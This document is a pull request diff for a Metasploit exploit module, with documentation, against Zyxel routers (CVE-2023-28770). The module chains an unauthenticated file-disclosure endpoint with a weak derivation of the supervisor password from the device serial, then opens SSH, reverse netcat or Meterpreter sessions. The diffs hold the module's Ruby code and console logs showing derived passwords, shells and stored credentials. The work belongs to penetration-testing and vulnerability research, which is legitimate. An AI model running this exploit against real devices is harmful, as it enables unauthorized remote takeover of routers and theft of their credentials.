### PR TITLE
 Zyxel chained RCE using LFI and weak password derivation algorithm

### DIFF
--- a/documentation/modules/exploit/linux/http/zyxel_lfi_unauth_ssh_rce.md
+++ b/documentation/modules/exploit/linux/http/zyxel_lfi_unauth_ssh_rce.md
@@ -1,0 +1,193 @@
+## Vulnerable Application
+
+This module exploits multiple vulnerabilities in the `zhttpd` binary (/bin/zhttpd) and `zcmd` binary (/bin/zcmd).
+It is present on more than 40 Zyxel routers and CPE devices.
+The remote code execution vulnerability can be exploited by chaining the local file disclosure (LFI) vulnerability
+in the `zhttpd` binary that allows an unauthenticated attacker to read the entire configuration of the router
+via the vulnerable endpoint `/Export_Log?/data/zcfg_config.json`.
+
+With this information disclosure, the attacker can determine if the router is reachable via `ssh` and use
+the second vulnerability in the` zcmd` binary to derive the `supervisor` password by exploiting a weak password
+derivation algorithm using the device serial number.
+
+After exploitation, an attacker will be able to execute any command as user `supervisor`.
+
+For more info, read this article: [Zyxel router chained RCE using LFI and Weak Password Derivation Algorithm (No CVE)](https://attackerkb.com/topics/dkw2Y2zdyN/zyxel-router-chained-rce-using-lfi-and-weak-password-derivation-algorithm-no-cve) on [attackerkb.com](url).
+
+Installing a vulnerable test bed requires a vulnerable Zyxel router.
+This module has been tested against a vulnerable Zyxel router with the specifications listed below:
+
+* Zyxel router VMG3625-T20A
+* Firmware: V5.30(ABOU.2)b1_I0_20180827
+
+## Verification Steps
+
+1. Start `msfconsole`
+1. `use exploit/linux/http/zyxel_lfi_unauth_ssh_rce`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set RPORT <port>`
+1. `set LHOST <attacker host ip>`
+1. `set LPORT <attacker host port>`
+1. `set TARGET <0=unix command, 1=Linux dropper, 2=Interactive SSH>`
+1. `exploit`
+1. You should be able to get a session based on the target setting.
+
+
+## Options
+Option `STORE_CRED` can be set to store the derived credentials (supervisor) in the database of Metasploit.
+Default setting is `true`.
+
+### Advanced options
+Option `SSH_DEBUG` can be set to enable SSH debugging output (Extreme verbosity!). Default is `false`.
+Option `SSH_TIMEOUT` can be used to specify the maximum time to negotiate a SSH session. Default is 30 seconds.
+
+## Scenarios
+
+### Zyxel router VMG3625-T20A - Netcat reverse shell
+```
+msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > options
+
+Module options (exploit/linux/http/zyxel_lfi_unauth_ssh_rce):
+
+   Name        Current Setting         Required  Description
+   ----        ---------------         --------  -----------
+   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS      192.168.1.1             yes       The target host(s), see https://docs.metasploit.com/docs/using-metasp
+                                                 loit/basics/using-metasploit.html
+   RPORT       8080                    yes       The target port (TCP)
+   SSL         false                   no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                             no        Path to a custom SSL certificate (default is randomly generated)
+   STORE_CRED  false                   no        Store credentials into the database.
+   URIPATH                             no        The URI to use for this exploit (default is random)
+   VHOST                               no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on th
+                                       e local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (cmd/unix/reverse_netcat):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.2      yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > set target 0
+target => 0
+msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.2:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] hardware: VMG3625-T20A software: V5.30(ABOU.2)b1_I0_20180827 serial: S000Y00000000
+[+] The target is vulnerable.
+[*] hardware: VMG3625-T20A software: V5.30(ABOU.2)b1_I0_20180827 serial: S000Y00000000
+[*] SSH service is available and SSH Port 22 is open. Continue to login.
+[*] Derived supervisor password using SerialNumMethod2: 2dc1a078
+[*] Derived supervisor password using SerialNumMethod3: 58Pxnwdefr
+[*] Authentication with derived supervisor password using Method2 is successful.
+[*] Executing Unix Command for cmd/unix/reverse_netcat
+[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.1:51236) at 2023-04-18 19:57:49 +0000
+
+uname -a
+Linux VMG3625-T20A 2.6.36 #7 SMP Mon Aug 27 19:59:01 CET 2018 mips GNU/Linux
+id
+uid=12(supervisor) gid=12 groups=12
+exit
+
+[*] 192.168.1.1 - Command shell session 1 closed.
+msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce)
+```
+
+### Zyxel router VMG3625-T20A - Linux Dropper Meterpreter session
+```
+msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > set target 1
+target => 1
+msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.2:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] hardware: VMG3625-T20A software: V5.30(ABOU.2)b1_I0_20180827 serial: S000Y00000000
+[+] The target is vulnerable.
+[*] hardware: VMG3625-T20A software: V5.30(ABOU.2)b1_I0_20180827 serial: S000Y00000000
+[*] SSH service is available and SSH Port 22 is open. Continue to login.
+[*] Derived supervisor password using SerialNumMethod2: 2dc1a078
+[*] Derived supervisor password using SerialNumMethod3: 58Pxnwdefr
+[*] Authentication with derived supervisor password using Method2 is successful.
+[*] Executing Linux Dropper for linux/mipsbe/meterpreter/reverse_tcp
+[*] Command Stager progress -  42.72% done (499/1168 bytes)
+[*] Command Stager progress -  85.36% done (997/1168 bytes)
+[*] Sending stage (1299256 bytes) to 127.0.0.1
+[*] Command Stager progress - 100.00% done (1168/1168 bytes)
+[*] Meterpreter session 2 opened (192.168.1.2:4444 -> 192.168.1.1:40364) at 2023-04-18 20:00:59 +0000
+
+meterpreter > getuid
+Server username: supervisor
+meterpreter > sysinfo
+Computer     : 192.168.1.1
+OS           :  (Linux 2.6.36)
+Architecture : mips
+BuildTuple   : mips-linux-muslsf
+Meterpreter  : mipsbe/linux
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.1.1 - Meterpreter session 2 closed.  Reason: User
+msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce)
+```
+
+### Zyxel router VMG3625-T20A - Interactive SSH session and storing the credentials of user supervisor
+```
+msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > set target 2
+target => 2
+msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > set STORE_CRED true
+STORE_CRED => true
+msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > exploit
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] hardware: VMG3625-T20A software: V5.30(ABOU.2)b1_I0_20180827 serial: S000Y00000000
+[+] The target is vulnerable.
+[*] hardware: VMG3625-T20A software: V5.30(ABOU.2)b1_I0_20180827 serial: S000Y00000000
+[*] SSH service is available and SSH Port 22 is open. Continue to login.
+[*] Derived supervisor password using SerialNumMethod2: 2dc1a078
+[*] Derived supervisor password using SerialNumMethod3: 58Pxnwdefr
+[*] Authentication with derived supervisor password using Method2 is successful.
+[*] Credentials for user:supervisor are added to the database...
+[*] SSH session 3 opened (192.168.1.2:34493 -> 192.168.1.1:22) at 2023-04-18 20:07:36 +0000
+
+uname -a
+Linux VMG3625-T20A 2.6.36 #7 SMP Mon Aug 27 20:08:48 CET 2018 mips GNU/Linux
+id
+uid=12(supervisor) gid=12 groups=12
+exit
+
+[*] 192.168.1.1 - SSH session 3 closed.  Reason: User exit
+msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > creds -u supervisor
+Credentials
+===========
+
+host           origin         service          public      private   realm  private_type  JtR Format
+----           ------         -------          ------      -------   -----  ------------  ----------
+192.168.1.1    192.168.1.1    8080/tcp (http)  supervisor  2dc1a078         Password
+
+msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > 
+```
+
+## Limitations
+No limitations identified.

--- a/documentation/modules/exploit/linux/http/zyxel_lfi_unauth_ssh_rce.md
+++ b/documentation/modules/exploit/linux/http/zyxel_lfi_unauth_ssh_rce.md
@@ -7,7 +7,7 @@ in the `zhttpd` binary that allows an unauthenticated attacker to read the entir
 via the vulnerable endpoint `/Export_Log?/data/zcfg_config.json`.
 
 With this information disclosure, the attacker can determine if the router is reachable via `ssh` and use
-the second vulnerability in the` zcmd` binary to derive the `supervisor` password by exploiting a weak password
+the second vulnerability in the `zcmd` binary to derive the `supervisor` password by exploiting a weak password
 derivation algorithm using the device serial number.
 
 After exploitation, an attacker will be able to execute any command as user `supervisor`.
@@ -40,6 +40,7 @@ Default setting is `true`.
 ### Advanced options
 Option `SSH_DEBUG` can be set to enable SSH debugging output (Extreme verbosity!). Default is `false`.
 Option `SSH_TIMEOUT` can be used to specify the maximum time to negotiate a SSH session. Default is 30 seconds.
+Option `ConnectTimeout` where you can specify the maximum number of seconds to establish a TCP connection. Default is 10 seconds.
 
 ## Scenarios
 
@@ -95,9 +96,9 @@ msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > exploit
 
 [*] Started reverse TCP handler on 192.168.1.2:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
-[*] hardware: VMG3625-T20A software: V5.30(ABOU.2)b1_I0_20180827 serial: S000Y00000000
+[*] Hardware:VMG3625-T20A Firmware:V5.30(ABOU.2)b1_I0_20180827 Serial:S000Y00000000
 [+] The target is vulnerable.
-[*] hardware: VMG3625-T20A software: V5.30(ABOU.2)b1_I0_20180827 serial: S000Y00000000
+[*] Hardware:VMG3625-T20A Firmware:V5.30(ABOU.2)b1_I0_20180827 Serial:S000Y00000000
 [*] SSH service is available and SSH Port 22 is open. Continue to login.
 [*] Derived supervisor password using SerialNumMethod2: 2dc1a078
 [*] Derived supervisor password using SerialNumMethod3: 58Pxnwdefr
@@ -123,9 +124,9 @@ msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > exploit
 
 [*] Started reverse TCP handler on 192.168.1.2:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
-[*] hardware: VMG3625-T20A software: V5.30(ABOU.2)b1_I0_20180827 serial: S000Y00000000
+[*] Hardware:VMG3625-T20A Firmware:V5.30(ABOU.2)b1_I0_20180827 Serial:S000Y00000000
 [+] The target is vulnerable.
-[*] hardware: VMG3625-T20A software: V5.30(ABOU.2)b1_I0_20180827 serial: S000Y00000000
+[*] Hardware:VMG3625-T20A Firmware:V5.30(ABOU.2)b1_I0_20180827 Serial:S000Y00000000
 [*] SSH service is available and SSH Port 22 is open. Continue to login.
 [*] Derived supervisor password using SerialNumMethod2: 2dc1a078
 [*] Derived supervisor password using SerialNumMethod3: 58Pxnwdefr
@@ -161,9 +162,9 @@ STORE_CRED => true
 msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > exploit
 
 [*] Running automatic check ("set AutoCheck false" to disable)
-[*] hardware: VMG3625-T20A software: V5.30(ABOU.2)b1_I0_20180827 serial: S000Y00000000
+[*] Hardware:VMG3625-T20A Firmware:V5.30(ABOU.2)b1_I0_20180827 Serial:S000Y00000000
 [+] The target is vulnerable.
-[*] hardware: VMG3625-T20A software: V5.30(ABOU.2)b1_I0_20180827 serial: S000Y00000000
+[*] Hardware:VMG3625-T20A Firmware:V5.30(ABOU.2)b1_I0_20180827 Serial:S000Y00000000
 [*] SSH service is available and SSH Port 22 is open. Continue to login.
 [*] Derived supervisor password using SerialNumMethod2: 2dc1a078
 [*] Derived supervisor password using SerialNumMethod3: 58Pxnwdefr

--- a/documentation/modules/exploit/linux/http/zyxel_lfi_unauth_ssh_rce.md
+++ b/documentation/modules/exploit/linux/http/zyxel_lfi_unauth_ssh_rce.md
@@ -18,7 +18,7 @@ Installing a vulnerable test bed requires a vulnerable Zyxel router.
 This module has been tested against a vulnerable Zyxel router with the specifications listed below:
 
 * Zyxel router VMG3625-T20A
-* Firmware: V5.30(ABOU.2)b1_I0_20180827
+* Firmware: V5.30(ABQC.3)C0
 
 ## Verification Steps
 
@@ -96,13 +96,13 @@ msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > exploit
 
 [*] Started reverse TCP handler on 192.168.1.2:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
-[*] Hardware:VMG3625-T20A Firmware:V5.30(ABOU.2)b1_I0_20180827 Serial:S000Y00000000
+[*] Hardware:VMG3625-T20A Firmware:V5.30(ABQC.3)C0 Serial:S000Y00000000
 [+] The target is vulnerable.
-[*] Hardware:VMG3625-T20A Firmware:V5.30(ABOU.2)b1_I0_20180827 Serial:S000Y00000000
+[*] Hardware:VMG3625-T20A Firmware:V5.30(ABQC.3)C0 Serial:S000Y00000000
 [*] SSH service is available and SSH Port 22 is open. Continue to login.
 [*] Derived supervisor password using SerialNumMethod2: 2dc1a078
 [*] Derived supervisor password using SerialNumMethod3: 58Pxnwdefr
-[*] Authentication with derived supervisor password using Method2 is successful.
+[*] Authentication with derived supervisor password using Method3 is successful.
 [*] Executing Unix Command for cmd/unix/reverse_netcat
 [*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.1:51236) at 2023-04-18 19:57:49 +0000
 
@@ -124,13 +124,13 @@ msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > exploit
 
 [*] Started reverse TCP handler on 192.168.1.2:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
-[*] Hardware:VMG3625-T20A Firmware:V5.30(ABOU.2)b1_I0_20180827 Serial:S000Y00000000
+[*] Hardware:VMG3625-T20A Firmware:V5.30(ABQC.3)C0 Serial:S000Y00000000
 [+] The target is vulnerable.
-[*] Hardware:VMG3625-T20A Firmware:V5.30(ABOU.2)b1_I0_20180827 Serial:S000Y00000000
+[*] Hardware:VMG3625-T20A Firmware:V5.30(ABQC.3)C0 Serial:S000Y00000000
 [*] SSH service is available and SSH Port 22 is open. Continue to login.
 [*] Derived supervisor password using SerialNumMethod2: 2dc1a078
 [*] Derived supervisor password using SerialNumMethod3: 58Pxnwdefr
-[*] Authentication with derived supervisor password using Method2 is successful.
+[*] Authentication with derived supervisor password using Method3 is successful.
 [*] Executing Linux Dropper for linux/mipsbe/meterpreter/reverse_tcp
 [*] Command Stager progress -  42.72% done (499/1168 bytes)
 [*] Command Stager progress -  85.36% done (997/1168 bytes)
@@ -162,13 +162,13 @@ STORE_CRED => true
 msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > exploit
 
 [*] Running automatic check ("set AutoCheck false" to disable)
-[*] Hardware:VMG3625-T20A Firmware:V5.30(ABOU.2)b1_I0_20180827 Serial:S000Y00000000
+[*] Hardware:VMG3625-T20A Firmware:V5.30(ABQC.3)C0 Serial:S000Y00000000
 [+] The target is vulnerable.
-[*] Hardware:VMG3625-T20A Firmware:V5.30(ABOU.2)b1_I0_20180827 Serial:S000Y00000000
+[*] Hardware:VMG3625-T20A Firmware:V5.30(ABQC.3)C0 Serial:S000Y00000000
 [*] SSH service is available and SSH Port 22 is open. Continue to login.
 [*] Derived supervisor password using SerialNumMethod2: 2dc1a078
 [*] Derived supervisor password using SerialNumMethod3: 58Pxnwdefr
-[*] Authentication with derived supervisor password using Method2 is successful.
+[*] Authentication with derived supervisor password using Method3 is successful.
 [*] Credentials for user:supervisor are added to the database...
 [*] SSH session 3 opened (192.168.1.2:34493 -> 192.168.1.1:22) at 2023-04-18 20:07:36 +0000
 
@@ -185,7 +185,7 @@ Credentials
 
 host           origin         service          public      private   realm  private_type  JtR Format
 ----           ------         -------          ------      -------   -----  ------------  ----------
-192.168.1.1    192.168.1.1    8080/tcp (http)  supervisor  2dc1a078         Password
+192.168.1.1    192.168.1.1    8080/tcp (http)  supervisor  58Pxnwdefr       Password
 
 msf6 exploit(linux/http/zyxel_lfi_unauth_ssh_rce) > 
 ```

--- a/modules/exploits/linux/http/zyxel_lfi_unauth_ssh_rce.rb
+++ b/modules/exploits/linux/http/zyxel_lfi_unauth_ssh_rce.rb
@@ -41,11 +41,12 @@ class MetasploitModule < Msf::Exploit::Remote
           'Bogi Napoleon Wennerstrøm'
         ],
         'References' => [
+          ['CVE', '2023-28770'],
           ['URL', 'https://r.sec-consult.com/zyxsploit'],
           ['URL', 'https://sec-consult.com/vulnerability-lab/advisory/multiple-critical-vulnerabilities-in-multiple-zyxel-devices/'],
           ['URL', 'https://th0mas.nl/2020/03/26/getting-root-on-a-zyxel-vmg8825-t50-router/'],
           ['URL', 'https://github.com/boginw/zyxel-vmg8825-keygen'],
-          ['URL', 'https://attackerkb.com/topics/dkw2Y2zdyN/zyxel-chained-rce-using-lfi-and-weak-aes-encryption-no-cve']
+          ['URL', 'https://attackerkb.com/topics/tPAvkwQgDK/cve-2023-28770']
         ],
         'DisclosureDate' => '2022-02-01',
         'Platform' => ['unix', 'linux'],

--- a/modules/exploits/linux/http/zyxel_lfi_unauth_ssh_rce.rb
+++ b/modules/exploits/linux/http/zyxel_lfi_unauth_ssh_rce.rb
@@ -244,7 +244,7 @@ class MetasploitModule < Msf::Exploit::Remote
           next unless (round3_byte_array[i] == keystr2_byte_array[j])
 
           index = offset2 + ((offset + j) % 0x18)
-          round3_byte_array[i] = valstr_bytes_array[index]
+          round3_byte_array[i] = valstr_byte_array[index]
           break
         end
       else
@@ -305,37 +305,61 @@ class MetasploitModule < Msf::Exploit::Remote
     })
   end
 
-  def process_configuration(res)
-    # Initiate the hash_config
-    hash_config = { 'hardware' => nil, 'software' => nil, 'serial' => nil, 'ssh_user' => nil, 'ssh_port' => nil, 'ssh_wan_access' => nil, 'ssh_service_enabled' => nil }
+  # Initiate the process configuration exception class used in the process_configuration function
+  class ProcessConfigException < StandardError
+    attr_reader :exception_type
 
+    def initialize(msg = 'This is my custom process config exception', exception_type = 'custom')
+      @exception_type = exception_type
+      super(msg)
+    end
+  end
+
+  def process_configuration(res)
     # Parse the device configuration json file
     res_json = res.get_json_document
-    if res_json.nil? || res_json.blank? || res_json.empty?
-      print_error('No device configuration file found.')
-      return hash_config
+    if res_json.blank?
+      raise ProcessConfigException.new 'No device configuration file found.', 'ConfigUnknown'
     end
+
     # process json output and retrieve information about supervisor user, ssh port and ssh WAN service status
-    # Also grab hardware and software version including the serial number to crack weak AES encrypted password of user supervisor
-    hash_config['hardware'] = res_json['DeviceInfo']['HardwareVersion'] if !res_json.dig('DeviceInfo', 'HardwareVersion').nil?
-    hash_config['software'] = res_json['DeviceInfo']['SoftwareVersion'] if !res_json.dig('DeviceInfo', 'SoftwareVersion').nil?
-    hash_config['serial'] = res_json['DeviceInfo']['SerialNumber'] if !res_json.dig('DeviceInfo', 'SerialNumber').nil?
+    # Also grab hardware and software version including the serial number to crack the password of user supervisor
+    @config['hardware'] = res_json.dig('DeviceInfo', 'HardwareVersion')
+    @config['software'] = res_json.dig('DeviceInfo', 'SoftwareVersion')
+    @config['serial'] = res_json.dig('DeviceInfo', 'SerialNumber')
 
     login_cfg = res_json.dig('X_ZYXEL_LoginCfg', 'LogGp')
     unless login_cfg.nil?
-      hash_config['ssh_user'] = login_cfg.select { |l| l['Account']&.select { |a| a['Username'] == 'supervisor' } }.blank? ? nil : 'supervisor'
+      @config['ssh_user'] = login_cfg.select { |l| l['Account']&.select { |a| a['Username'] == 'supervisor' } }.blank? ? nil : 'supervisor'
     end
 
     remote_service = res_json.dig('X_ZYXEL_RemoteManagement', 'Service')
     unless remote_service.nil?
       service = remote_service.select { |s| s['Name'] == 'SSH' }.first
-      if !service.blank? && (service['Name'] == 'SSH')
-        hash_config['ssh_port'] = service['Port']
-        hash_config['ssh_wan_access'] = service['Mode']
-        hash_config['ssh_service_enabled'] = service['Enable']
+      if service&.fetch('Name', nil) == 'SSH'
+        @config['ssh_port'] = service['Port']
+        @config['ssh_wan_access'] = service['Mode']
+        @config['ssh_service_enabled'] = service['Enable']
       end
     end
-    return hash_config
+    print_status("Hardware:#{@config['hardware']} Firmware:#{@config['software']} Serial:#{@config['serial']}")
+
+    # check if all hash key/value pairs are populated and raise exceptions if retrieved config is not vulnerable
+    if @config['serial'].nil? || @config['ssh_user'].nil? || @config['ssh_port'].nil? || @config['ssh_wan_access'].nil? || @config['ssh_service_enabled'].nil?
+      raise ProcessConfigException.new 'Device serial, supervisor user, SSH port, or SSH WAN access/service status not found.', 'ConfigUnknown'
+    end
+
+    # check if ssh service is enabled
+    # if true then check ssh_port is open and ssh service is accessible from the WAN side
+    if @config['ssh_service_enabled']
+      if @config['ssh_wan_access'] == 'LAN_WAN' && check_port(@config['ssh_port'])
+        return
+      else
+        raise ProcessConfigException.new "WAN access to SSH service is NOT allowed or SSH port #{@config['ssh_port']} is closed. Try exploit from the LAN side.", 'ConfigUnreachable'
+      end
+    else
+      raise ProcessConfigException.new 'SSH service is NOT available.', 'ConfigNotVulnerable'
+    end
   end
 
   def execute_command(cmd, _opts = {})
@@ -386,64 +410,75 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
+    # Initiate the instance variable config to store the configuration
+    @config = { 'hardware' => nil, 'software' => nil, 'serial' => nil, 'ssh_user' => nil, 'ssh_port' => nil, 'ssh_wan_access' => nil, 'ssh_service_enabled' => nil }
+
     res = get_configuration
     return CheckCode::Safe if res.nil? || res.code != 200
 
-    config = process_configuration(res)
-
-    # check if all hash key/value pairs are populated
-    print_status("Hardware:#{config['hardware']} Firmware:#{config['software']} Serial:#{config['serial']}")
-    if config['serial'].nil? || config['ssh_user'].nil? || config['ssh_port'].nil? || config['ssh_wan_access'].nil? || config['ssh_service_enabled'].nil?
-      return CheckCode::Unknown('Device serial, supervisor user, SSH port, or SSH WAN access/service status not found.')
-    end
-
-    # check if ssh service is enabled
-    # if true then check ssh_port is open and ssh service is accessible from the WAN side
-    if config['ssh_service_enabled']
-      if config['ssh_wan_access'] == 'LAN_WAN' && check_port(config['ssh_port'])
-        return CheckCode::Vulnerable
-      else
-        return CheckCode::Detected("WAN access to SSH service is NOT allowed or SSH port #{config['ssh_port']} is closed. Try exploit from the LAN side.")
+    begin
+      process_configuration(res)
+    rescue ProcessConfigException => e
+      case e.exception_type
+      when 'ConfigNotVulnerable'
+        return CheckCode::Safe(e.message)
+      when 'ConfigUnreachable'
+        return CheckCode::Safe(e.message)
+      when 'ConfigUnknown'
+        return CheckCode::Unknown(e.message)
       end
-    else
-      return CheckCode::Safe('SSH service is NOT available.')
     end
+    return CheckCode::Vulnerable
   end
 
   def exploit
-    res = get_configuration
-    fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') if res.nil? || res.code != 200
+    # run if AutoCheck is NOT set, otherwise use the information gathered during the check method
+    unless datastore['AutoCheck']
+      # Initiate the instance variable config to store the configuration
+      @config = { 'hardware' => nil, 'software' => nil, 'serial' => nil, 'ssh_user' => nil, 'ssh_port' => nil, 'ssh_wan_access' => nil, 'ssh_service_enabled' => nil }
 
-    config = process_configuration(res)
+      res = get_configuration
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') if res.nil? || res.code != 200
 
-    # check if all hash key/value pairs are populated
-    print_status("Hardware:#{config['hardware']} Firmware:#{config['software']} Serial:#{config['serial']}")
-    if config['serial'].nil? || config['ssh_user'].nil? || config['ssh_port'].nil? || config['ssh_wan_access'].nil? || config['ssh_service_enabled'].nil?
-      fail_with(Failure::NotVulnerable, 'Device serial, supervisor user, SSH port or SSH WAN access/service status not found.')
+      begin
+        process_configuration(res)
+      rescue ProcessConfigException => e
+        case e.exception_type
+        when 'ConfigNotVulnerable'
+          return fail_with(Failure::NotVulnerable, e.message)
+        when 'ConfigUnreachable'
+          return fail_with(Failure::Unreachable, e.message)
+        when 'ConfigUnknown'
+          return fail_with(Failure::Unknown, e.message)
+        end
+      end
     end
 
-    # check if ssh service is enabled
-    # if true then check ssh_port is open and ssh service is accessible from the WAN side
-    if config['ssh_service_enabled']
-      if config['ssh_wan_access'] == 'LAN_WAN' && check_port(config['ssh_port'])
-        print_status("SSH service is available and SSH Port #{config['ssh_port']} is open. Continue to login.")
+    # extra checks added to handle ForceExploit true setting
+    if @config['ssh_service_enabled']
+      if @config['ssh_wan_access'] == 'LAN_WAN' && check_port(@config['ssh_port'])
+        print_status("SSH service is available and SSH Port #{@config['ssh_port']} is open. Continue to login.")
       else
-        fail_with(Failure::Unreachable, "WAN access to SSH service is NOT allowed or SSH port #{config['ssh_port']} is closed. Try exploit from the LAN side.")
+        fail_with(Failure::Unreachable, 'SSH service is not availabe and/or SSH port is closed.')
       end
     else
-      fail_with(Failure::NotVulnerable, 'SSH service is NOT available.')
+      fail_with(Failure::BadConfig, 'SSH service and/or SSH port information is missing.')
     end
 
     # derive supervisor password candidates using password derivation method SerialNumMethod2 and SerialNumMethod3
-    supervisor_pwd = crack_supervisor_pwd(config['serial'])
+    if @config['serial'].nil?
+      fail_with(Failure::BadConfig, 'Serial device number is missing to crack the supervisor password.')
+    else
+      supervisor_pwd = crack_supervisor_pwd(@config['serial'])
+    end
 
     # try supervisor password derived by SerialNumMethod3 first, if it fails then try the password derived by SerialNumMethod2
-    if do_login(datastore['RHOST'], config['ssh_user'], supervisor_pwd['method3'], config['ssh_port'])
+    if do_login(datastore['RHOST'], @config['ssh_user'], supervisor_pwd['method3'], @config['ssh_port'])
       print_status('Authentication with derived supervisor password using Method3 is successful.')
-      report_creds(config['ssh_user'], supervisor_pwd['method3']) if datastore['STORE_CRED']
-    elsif do_login(datastore['RHOST'], config['ssh_user'], supervisor_pwd['method2'], config['ssh_port'])
+      report_creds(@config['ssh_user'], supervisor_pwd['method3']) if datastore['STORE_CRED']
+    elsif do_login(datastore['RHOST'], @config['ssh_user'], supervisor_pwd['method2'], @config['ssh_port'])
       print_status('Authentication with derived supervisor password using Method2 is successful.')
-      report_creds(config['ssh_user'], supervisor_pwd['method2']) if datastore['STORE_CRED']
+      report_creds(@config['ssh_user'], supervisor_pwd['method2']) if datastore['STORE_CRED']
     else
       fail_with(Failure::NoAccess, 'Both supervisor password derivation methods failed to authenticate.')
     end

--- a/modules/exploits/linux/http/zyxel_lfi_unauth_ssh_rce.rb
+++ b/modules/exploits/linux/http/zyxel_lfi_unauth_ssh_rce.rb
@@ -22,8 +22,8 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'Zyxel chained RCE using LFI and weak password derivation algorithm',
         'Description' => %q{
-          This module exploits multiple vulnerabilities in the zhttpd binary (/bin/zhttpd)
-          and zcmd binary (/bin/zcmd). It is present on more than 40 Zyxel routers and CPE devices.
+          This module exploits multiple vulnerabilities in the `zhttpd` binary (/bin/zhttpd)
+          and `zcmd` binary (/bin/zcmd). It is present on more than 40 Zyxel routers and CPE devices.
           The remote code execution vulnerability can be exploited by chaining the local file disclosure
           vulnerability in the zhttpd binary that allows an unauthenticated attacker to read the entire configuration
           of the router via the vulnerable endpoint `/Export_Log?/data/zcfg_config.json`.
@@ -93,6 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'DefaultOptions' => {
           'RPORT' => 80,
           'SSL' => false,
+          'SSH_TIMEOUT' => 30,
           'WfsDelay' => 5
         },
         'Notes' => {
@@ -109,8 +110,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     register_advanced_options(
       [
-        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
-        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
+        OptInt.new('ConnectTimeout', [ true, 'Maximum number of seconds to establish a TCP connection', 10])
       ]
     )
   end
@@ -292,7 +292,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     cred_res = create_credential_and_login(credential_data)
     unless cred_res.nil?
-      print_status("Credentials for user:#{user} are added to the database...")
+      print_status("Credentials for user:#{user} are added to the database.")
     end
   end
 
@@ -309,12 +309,7 @@ class MetasploitModule < Msf::Exploit::Remote
     hash_config = { 'hardware' => nil, 'software' => nil, 'serial' => nil, 'ssh_user' => nil, 'ssh_port' => nil, 'ssh_wan_access' => nil, 'ssh_service_enabled' => nil }
 
     # Parse the device configuration json file
-    begin
-      res_json = res.get_json_document
-    rescue JSON::ParserError => e
-      print_error("Unable to parse the JSON response. Error: #{e}")
-      return hash_config
-    end
+    res_json = res.get_json_document
     if res_json.nil? || res_json.blank? || res_json.empty?
       print_error('No device configuration file found.')
       return hash_config
@@ -379,12 +374,14 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def check_port(port)
     # checks network port and return true if open and false if closed.
-    (sleep datastore['WfsDelay']) until begin
-      TCPSocket.open(datastore['RHOST'], port)
+    Timeout.timeout(datastore['ConnectTimeout']) do
+      TCPSocket.new(datastore['RHOST'], port).close
+      return true
     rescue StandardError
       return false
     end
-    return true
+  rescue Timeout::Error
+    return false
   end
 
   def check
@@ -394,7 +391,7 @@ class MetasploitModule < Msf::Exploit::Remote
     config = process_configuration(res)
 
     # check if all hash key/value pairs are populated
-    print_status("hardware: #{config['hardware']} software: #{config['software']} serial: #{config['serial']}")
+    print_status("Hardware:#{config['hardware']} Firmware:#{config['software']} Serial:#{config['serial']}")
     if config['serial'].nil? || config['ssh_user'].nil? || config['ssh_port'].nil? || config['ssh_wan_access'].nil? || config['ssh_service_enabled'].nil?
       return CheckCode::Unknown('Device serial, supervisor user, SSH port, or SSH WAN access/service status not found.')
     end
@@ -419,7 +416,7 @@ class MetasploitModule < Msf::Exploit::Remote
     config = process_configuration(res)
 
     # check if all hash key/value pairs are populated
